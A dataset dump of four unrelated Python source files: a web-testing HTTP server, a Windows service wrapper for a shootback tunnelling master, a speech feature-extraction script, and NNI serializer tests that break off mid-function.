source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
server.py | import BaseHTTPServer
import errno
import os
import re
import socket
from SocketServer import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import types
import urlparse
import routes as default_routes
from logger import get_logger
from request import Server, Request
from response import Response
from router import Router
from utils import HTTPException
"""HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data had been finalised, Request and Reponse
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if type(methods) in types.StringTypes:
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlparse.urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlparse.urlunsplit(new_url)
request_handler.path = new_url
class WebTestServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, RequestHandlerClass, router, rewriter, bind_hostname,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param RequestHandlerClass: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_hostname True to bind the server to both the hostname and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the hostname.
:param latency: Delay in ms to wait before seving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_hostname:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
#super doesn't work here because BaseHTTPServer.HTTPServer is old-style
BaseHTTPServer.HTTPServer.__init__(self, hostname_port, RequestHandlerClass, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
Server.config = {"host": server_address[0],
"domains": {"": server_address[0]},
"ports": {"http": [self.server_address[1]]}}
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_value
if ((isinstance(error, socket.error) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors)
or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
self.logger.error(traceback.format_exc())
class WebTestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
self.logger = get_logger()
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
response.set_error(e.code, e.message)
except Exception as e:
if e.message:
err = [e.message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
except socket.timeout, e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception as e:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
self.logger.error(err)
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except socket.error:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
class WebTestHttpd(object):
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_hostname: Boolean indicating whether to bind server to hostname.
:param latency: Delay in ms to wait before seving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indictaing whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, routes=None,
rewriter_cls=RequestRewriter, bind_hostname=True, rewrites=None,
latency=None, config=None):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if key_file is not None:
assert os.path.exists(key_file)
assert certificate is not None and os.path.exists(certificate)
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_hostname=bind_hostname,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.error('Init failed! You may need to modify your hosts file. Refer to README.md.');
raise
def start(self, block=False):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
self.logger.info("Starting http server on %s:%s" % (self.host, self.port))
self.started = True
if block:
self.httpd.serve_forever()
else:
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlparse.urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
|
MasterService.py | #!/usr/bin/env python
# - encoding: utf-8
import win32serviceutil
import win32service
import win32event
import sys
import servicemanager
import time
import win32timezone
import logging
import traceback
from master import main_master
import threading
from configparser import ConfigParser
from pathlib import Path
cur_exe_dir = Path(sys.argv[0]).parent
master_logger = logging.getLogger()
def init_log():
global master_logger
master_logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(cur_exe_dir.joinpath('master.log'))
# master_logger.addHandler(fileHandler)
class MasterService(win32serviceutil.ServiceFramework):
# 服务名
_svc_name_ = "MasterService"
# 服务在windows系统中显示的名称
_svc_display_name_ = "MasterService"
# 服务的描述
_svc_description_ = "This code is a shootback MasterService"
config = ConfigParser()
def __init__(self, args):
print('init...')
if args != 'Debug':
self.debug = False
else:
self.debug = True
if not self.debug:
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.working_ = True
self.args = args
MasterService.config.read(cur_exe_dir.joinpath('master.ini'))
self.log('MasterService.__init__')
try:
master_logger.info('args=%s', args)
except BaseException as e:
self.log('init exception=' + str(e))
def ReportServiceStatus(self, serviceStatus, waitHint = 5000, win32ExitCode = 0, svcExitCode = 0):
master_logger.info('ReportServiceStatus status=%d', serviceStatus)
if not self.debug:
super(MasterService, self).ReportServiceStatus(serviceStatus, waitHint, win32ExitCode, svcExitCode)
def SvcDoRun(self):
# 把自己的代码放到这里,就OK
# 等待服务被停止
master_logger.info('python service SvcDoRun...')
self.ReportServiceStatus(win32service.SERVICE_START_PENDING)
try:
raw_args = MasterService.config.get('master', 'raw_args', fallback='-m 0.0.0.0:8082 -c 0.0.0.0:3390')
log_fille = cur_exe_dir.joinpath('master.log')
print('')
master_thread = threading.Thread(target=main_master, args=(raw_args.split(), log_fille))
master_thread.start()
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
self.log('start')
while self.working_:
try:
master_logger.info('SvcDoRun looping...')
except BaseException as e:
self.log('SvcDoRun exception=' + str(e) + ':' + traceback.format_exc())
# logger.info("SvcDoRun looping...")
time.sleep(3)
#win32event.WaitForSingleObject(self.hWaitStop, win32event.INFINITE)
self.log('done')
except BaseException as e:
error_log = 'Exception : %s' % e
self.log(error_log)
self.SvcStop()
def log(self, msg):
servicemanager.LogInfoMsg(str(msg))
master_logger.error(msg)
def SvcStop(self):
# 先告诉SCM停止这个过程
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# 设置事件
#win32event.SetEvent(self.hWaitStop)
self.working_ = False
# if __name__ == '__main__':
# #multiprocessing.freeze_support()
# if len(sys.argv) == 1:
# evtsrc_dll = os.path.abspath(servicemanager.__file__)
# servicemanager.PrepareToHostSingle(MasterService)
# servicemanager.Initialize('MasterService', evtsrc_dll)
# servicemanager.StartServiceCtrlDispatcher()
# else:
# win32serviceutil.HandleCommandLine(MasterService)
# # 括号里参数可以改成其他名字,但是必须与class类名一致;
if __name__ == '__main__':
init_log()
#multiprocessing.freeze_support()
master_logger.info('master service start...')
if len(sys.argv) > 1 and sys.argv[1] == 'debug':
service = MasterService('Debug')
service.SvcDoRun()
exit(0)
if len(sys.argv) == 1:
servicemanager.Initialize()
servicemanager.PrepareToHostSingle(MasterService)
servicemanager.StartServiceCtrlDispatcher()
else:
win32serviceutil.HandleCommandLine(MasterService)
# 括号里参数可以改成其他名字,但是必须与class类名一致;
|
feature_extract.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020 Patrick Lumban Tobing (Nagoya University)
# based on PyTorch implementation for WaveNet vocoder by Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
import multiprocessing as mp
import os
import sys
from distutils.util import strtobool
import logging
import numpy as np
from numpy.matlib import repmat
from scipy.interpolate import interp1d
import soundfile as sf
from scipy.signal import firwin
from scipy.signal import lfilter
from utils import find_files
from utils import read_txt
from utils import write_hdf5, read_hdf5
from multiprocessing import Array
import pysptk as ps
import pyworld as pw
#np.set_printoptions(threshold=np.inf)
FS = 24000
SHIFTMS = 5
MINF0 = 40
MAXF0 = 700
MCEP_DIM = 49
MCEP_ALPHA = 0.466 #24k
FFTL = 2048
IRLEN = 1024
LOWPASS_CUTOFF = 20
HIGHPASS_CUTOFF = 65
OVERWRITE = True
def low_cut_filter(x, fs, cutoff=HIGHPASS_CUTOFF):
"""FUNCTION TO APPLY LOW CUT FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low cut filter
Return:
(ndarray): Low cut filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
fil = firwin(1023, norm_cutoff, pass_zero=False)
lcf_x = lfilter(fil, 1, x)
return lcf_x
def analyze(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
if f0 is None or time_axis is None:
_f0, time_axis = pw.harvest(wav, fs, f0_floor=60.0, frame_period=fperiod)
f0 = pw.stonemask(wav, _f0, time_axis, fs)
sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
return time_axis, f0, sp, ap
def analyze_range(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
if f0 is None or time_axis is None:
_f0, time_axis = pw.harvest(wav, fs, f0_floor=minf0, f0_ceil=maxf0, frame_period=fperiod)
f0 = pw.stonemask(wav, _f0, time_axis, fs)
sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
return time_axis, f0, sp, ap
def read_wav(wav_file, cutoff=HIGHPASS_CUTOFF):
x, fs = sf.read(wav_file)
if cutoff != 0:
x = low_cut_filter(x, fs, cutoff)
return fs, x
def convert_f0(f0, f0_mean_src, f0_std_src, f0_mean_trg, f0_std_trg):
nonzero_indices = f0 > 0
cvf0 = np.zeros(len(f0))
cvf0[nonzero_indices] = \
np.exp((f0_std_trg/f0_std_src)*(np.log(f0[nonzero_indices])-f0_mean_src)+f0_mean_trg)
return cvf0
def mod_pow(cvmcep, mcep, alpha=MCEP_ALPHA, irlen=IRLEN):
cv_e = ps.mc2e(cvmcep, alpha=alpha, irlen=irlen)
r_e = ps.mc2e(mcep, alpha=alpha, irlen=irlen)
dpow = np.log(r_e/cv_e) / 2
mod_cvmcep = np.copy(cvmcep)
mod_cvmcep[:,0] += dpow
return mod_cvmcep
def extfrm(data, npow, power_threshold=-20):
T = data.shape[0]
if T != len(npow):
raise("Length of two vectors is different.")
valid_index = np.where(npow > power_threshold)
extdata = data[valid_index]
assert extdata.shape[0] <= T
return extdata, valid_index
def spc2npow(spectrogram):
npow = np.apply_along_axis(spvec2pow, 1, spectrogram)
meanpow = np.mean(npow)
npow = 10.0 * np.log10(npow/meanpow)
return npow
def spvec2pow(specvec):
fftl2 = len(specvec) - 1
fftl = fftl2 * 2
power = specvec[0] + specvec[fftl2]
for k in range(1, fftl2):
power += 2.0 * specvec[k]
power /= fftl
return power
def low_pass_filter(x, fs, cutoff=LOWPASS_CUTOFF, padding=True):
"""FUNCTION TO APPLY LOW PASS FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low pass filter
Return:
(ndarray): Low pass filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
numtaps = 255
fil = firwin(numtaps, norm_cutoff)
x_pad = np.pad(x, (numtaps, numtaps), 'edge')
lpf_x = lfilter(fil, 1, x_pad)
lpf_x = lpf_x[numtaps + numtaps // 2: -numtaps // 2]
return lpf_x
def convert_continuos_f0(f0):
"""CONVERT F0 TO CONTINUOUS F0
Args:
f0 (ndarray): original f0 sequence with the shape (T)
Return:
(ndarray): continuous f0 with the shape (T)
"""
# get uv information as binary
uv = np.float32(f0 != 0)
# get start and end of f0
start_f0 = f0[f0 != 0][0]
end_f0 = f0[f0 != 0][-1]
# padding start and end of f0 sequence
start_idx = np.where(f0 == start_f0)[0][0]
end_idx = np.where(f0 == end_f0)[0][-1]
f0[:start_idx] = start_f0
f0[end_idx:] = end_f0
# get non-zero frame index
nz_frames = np.where(f0 != 0)[0]
# perform linear interpolation
f = interp1d(nz_frames, f0[nz_frames])
cont_f0 = f(np.arange(0, f0.shape[0]))
return uv, cont_f0
def main():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
parser.add_argument("--expdir", required=True,
type=str, help="directory to save the log")
parser.add_argument(
"--waveforms", default=None,
help="directory or list of filename of input wavfile")
parser.add_argument(
"--hdf5dir", default=None,
help="directory to save hdf5")
parser.add_argument(
"--wavdir", default=None,
help="directory to save of preprocessed wav file")
parser.add_argument(
"--wavfiltdir", default=None,
help="directory to save of preprocessed wav file")
parser.add_argument(
"--fs", default=FS,
type=int, help="Sampling frequency")
parser.add_argument(
"--shiftms", default=SHIFTMS,
type=int, help="Frame shift in msec")
parser.add_argument(
"--minf0", default=MINF0,
type=int, help="minimum f0")
parser.add_argument(
"--maxf0", default=MAXF0,
type=int, help="maximum f0")
parser.add_argument(
"--mcep_dim", default=MCEP_DIM,
type=int, help="Dimension of mel cepstrum")
parser.add_argument(
"--mcep_alpha", default=MCEP_ALPHA,
type=float, help="Alpha of mel cepstrum")
parser.add_argument(
"--pow", default=-20,
type=float, help="Power threshold")
parser.add_argument(
"--fftl", default=FFTL,
type=int, help="FFT length")
parser.add_argument("--init", default=False,
type=strtobool, help="flag for computing stats of dtw-ed feature")
parser.add_argument(
"--highpass_cutoff", default=HIGHPASS_CUTOFF,
type=int, help="Cut off frequency in lowpass filter")
parser.add_argument(
"--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
args = parser.parse_args()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
logging.warn("logging is disabled.")
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
file_list = read_txt(args.waveforms)
# check directory existence
if (args.wavdir is not None) and (not os.path.exists(args.wavdir)):
os.makedirs(args.wavdir)
if (args.wavfiltdir is not None) and (not os.path.exists(args.wavfiltdir)):
os.makedirs(args.wavfiltdir)
if not os.path.exists(args.hdf5dir):
os.makedirs(args.hdf5dir)
def feature_extract(wav_list, arr, max_frame_list):
n_wav = len(wav_list)
n_sample = 0
n_frame = 0
max_frame = 0
count = 1
for wav_name in wav_list:
# load wavfile and apply low cut filter
fs, x = read_wav(wav_name, cutoff=args.highpass_cutoff)
n_sample += x.shape[0]
logging.info(wav_name+" "+str(x.shape[0])+" "+str(n_sample)+" "+str(count))
# check sampling frequency
if not fs == args.fs:
logging.info("ERROR: sampling frequency is not matched.")
sys.exit(1)
hdf5name = args.hdf5dir + "/" + os.path.basename(wav_name).replace(".wav", ".h5")
if not args.init:
time_axis_range, f0_range, spc_range, ap_range = analyze_range(x, fs=fs, minf0=args.minf0, \
maxf0=args.maxf0, fperiod=args.shiftms, fftl=args.fftl)
write_hdf5(hdf5name, "/f0_range", f0_range)
uv_range, cont_f0_range = convert_continuos_f0(np.array(f0_range))
cont_f0_lpf_range = \
low_pass_filter(cont_f0_range, int(1.0 / (args.shiftms * 0.001)), cutoff=20)
codeap_range = pw.code_aperiodicity(ap_range, fs)
mcep_range = ps.sp2mc(spc_range, args.mcep_dim, args.mcep_alpha)
npow_range = spc2npow(spc_range)
mcepspc_range, spcidx_range = extfrm(mcep_range, npow_range, power_threshold=args.pow)
logging.info(wav_name+" "+str(mcepspc_range.shape[0])+" "+str(mcepspc_range.shape[1])+\
" "+str(count))
cont_f0_lpf_range = np.expand_dims(cont_f0_lpf_range, axis=-1)
uv_range = np.expand_dims(uv_range, axis=-1)
if codeap_range.ndim == 1:
codeap_range = np.expand_dims(codeap_range, axis=-1)
feat_org_lf0 = np.c_[uv_range,np.log(cont_f0_lpf_range),codeap_range,mcep_range]
write_hdf5(hdf5name, "/feat_org_lf0", feat_org_lf0)
write_hdf5(hdf5name, "/npow_range", npow_range)
write_hdf5(hdf5name, "/spcidx_range", spcidx_range)
n_frame += feat_org_lf0.shape[0]
if max_frame < feat_org_lf0.shape[0]:
max_frame = feat_org_lf0.shape[0]
if args.highpass_cutoff != 0 and args.wavfiltdir is not None:
sf.write(args.wavfiltdir + "/" + os.path.basename(wav_name), x, fs, 'PCM_16')
wavpath = args.wavdir + "/" + os.path.basename(wav_name)
logging.info(wavpath)
sp_rec = ps.mc2sp(mcep_range, args.mcep_alpha, args.fftl)
wav = np.clip(pw.synthesize(f0_range, sp_rec, ap_range, fs, frame_period=args.shiftms), \
-1, 1)
sf.write(wavpath, wav, fs, 'PCM_16')
else:
time_axis, f0, spc, ap = analyze(x, fs=fs, fperiod=args.shiftms, fftl=args.fftl)
write_hdf5(hdf5name, "/f0", f0)
npow = spc2npow(spc)
write_hdf5(hdf5name, "/npow", npow)
n_frame += f0.shape[0]
if max_frame < f0.shape[0]:
max_frame = f0.shape[0]
count += 1
arr[0] += n_wav
arr[1] += n_sample
arr[2] += n_frame
max_frame_list.append(max_frame)
if (n_wav > 0):
logging.info(str(arr[0])+" "+str(n_wav)+" "+str(arr[1])+" "+str(n_sample/n_wav)+" "+\
str(arr[2])+" "+str(n_frame/n_wav)+" max_frame = "+str(max_frame))
# divie list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
with mp.Manager() as manager:
processes = []
arr = mp.Array('d', 3)
max_frame_list = manager.list()
for f in file_lists:
p = mp.Process(target=feature_extract, args=(f,arr,max_frame_list))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
logging.info(str(arr[0])+" "+str(arr[1])+" "+str(arr[1]/arr[0])+" "+str(arr[2])+" "+str(arr[2]/arr[0]))
logging.info('max_frame: %ld' % (np.max(max_frame_list)))
if __name__ == "__main__":
main()
|
test_serializer.py | import math
import os
import pickle
import subprocess
import sys
from pathlib import Path
import pytest
import nni
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import MNIST
from nni.common.serializer import is_traceable
if True: # prevent auto formatting
sys.path.insert(0, Path(__file__).parent.as_posix())
from imported.model import ImportTest
# this test cannot be directly put in this file. It will cause syntax error for python <= 3.7.
if tuple(sys.version_info) >= (3, 8):
from imported._test_serializer_py38 import test_positional_only
@nni.trace
class SimpleClass:
def __init__(self, a, b=1):
self._a = a
self._b = b
@nni.trace
class EmptyClass:
pass
class UnserializableSimpleClass:
def __init__(self):
self._a = 1
def test_simple_class():
instance = SimpleClass(1, 2)
assert instance._a == 1
assert instance._b == 2
dump_str = nni.dump(instance)
assert '"__kwargs__": {"a": 1, "b": 2}' in dump_str
assert '"__symbol__"' in dump_str
instance = nni.load(dump_str)
assert instance._a == 1
assert instance._b == 2
def test_external_class():
from collections import OrderedDict
d = nni.trace(kw_only=False)(OrderedDict)([('a', 1), ('b', 2)])
assert d['a'] == 1
assert d['b'] == 2
dump_str = nni.dump(d)
assert dump_str == '{"a": 1, "b": 2}'
conv = nni.trace(torch.nn.Conv2d)(3, 16, 3)
assert conv.in_channels == 3
assert conv.out_channels == 16
assert conv.kernel_size == (3, 3)
assert nni.dump(conv) == \
r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", ' \
r'"__kwargs__": {"in_channels": 3, "out_channels": 16, "kernel_size": 3}}'
conv = nni.load(nni.dump(conv))
assert conv.kernel_size == (3, 3)
def test_nested_class():
a = SimpleClass(1, 2)
b = SimpleClass(a)
assert b._a._a == 1
dump_str = nni.dump(b)
b = nni.load(dump_str)
assert 'SimpleClass object at' in repr(b)
assert b._a._a == 1
def test_unserializable():
a = UnserializableSimpleClass()
dump_str = nni.dump(a)
a = nni.load(dump_str)
assert a._a == 1
def test_function():
t = nni.trace(math.sqrt, kw_only=False)(3)
assert 1 < t < 2
assert t.trace_symbol == math.sqrt
assert t.trace_args == [3]
t = nni.load(nni.dump(t))
assert 1 < t < 2
assert not is_traceable(t) # trace not recovered, expected, limitation
def simple_class_factory(bb=3.):
return SimpleClass(1, bb)
t = nni.trace(simple_class_factory)(4)
ts = nni.dump(t)
assert '__kwargs__' in ts
t = nni.load(ts)
assert t._a == 1
assert is_traceable(t)
t = t.trace_copy()
assert is_traceable(t)
assert t.trace_symbol(10)._b == 10
assert t.trace_kwargs['bb'] == 4
assert is_traceable(t.trace_copy())
class Foo:
def __init__(self, a, b=1):
self.aa = a
self.bb = [b + 1 for _ in range(1000)]
def __eq__(self, other):
return self.aa == other.aa and self.bb == other.bb
def test_custom_class():
module = nni.trace(Foo)(3)
assert nni.load(nni.dump(module)) == module
module = nni.trace(Foo)(b=2, a=1)
assert nni.load(nni.dump(module)) == module
module = nni.trace(Foo)(Foo(1), 5)
dumped_module = nni.dump(module)
module = nni.load(dumped_module)
assert module.bb[0] == module.bb[999] == 6
module = nni.trace(Foo)(nni.trace(Foo)(1), 5)
dumped_module = nni.dump(module)
assert nni.load(dumped_module) == module
class Foo:
def __init__(self, a, b=1):
self.aa = a
self.bb = [b + 1 for _ in range(1000)]
def __eq__(self, other):
return self.aa == other.aa and self.bb == other.bb
def test_basic_unit_and_custom_import():
module = ImportTest(3, 0.5)
ss = nni.dump(module)
assert ss == r'{"__symbol__": "path:imported.model.ImportTest", "__kwargs__": {"foo": 3, "bar": 0.5}}'
assert nni.load(nni.dump(module)) == module
import nni.retiarii.nn.pytorch as nn
module = nn.Conv2d(3, 10, 3, bias=False)
ss = nni.dump(module)
assert ss == r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", "__kwargs__": {"in_channels": 3, "out_channels": 10, "kernel_size": 3, "bias": false}}'
assert nni.load(ss).bias is None
def test_dataset():
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True)
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
dumped_ans = {
"__symbol__": "path:torch.utils.data.dataloader.DataLoader",
"__kwargs__": {
"dataset": {
"__symbol__": "path:torchvision.datasets.mnist.MNIST",
"__kwargs__": {"root": "data/mnist", "train": False, "download": True}
},
"batch_size": 10
}
}
print(nni.dump(dataloader))
print(nni.dump(dumped_ans))
assert nni.dump(dataloader) == nni.dump(dumped_ans)
dataloader = nni.load(nni.dump(dumped_ans))
assert isinstance(dataloader, DataLoader)
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)([
nni.trace(transforms.ToTensor)(),
nni.trace(transforms.Normalize)((0.1307,), (0.3081,))
]))
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
x, y = next(iter(nni.load(nni.dump(dataloader))))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
))
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
x, y = next(iter(nni.load(nni.dump(dataloader))))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
def test_pickle():
pickle.dumps(EmptyClass())
obj = SimpleClass(1)
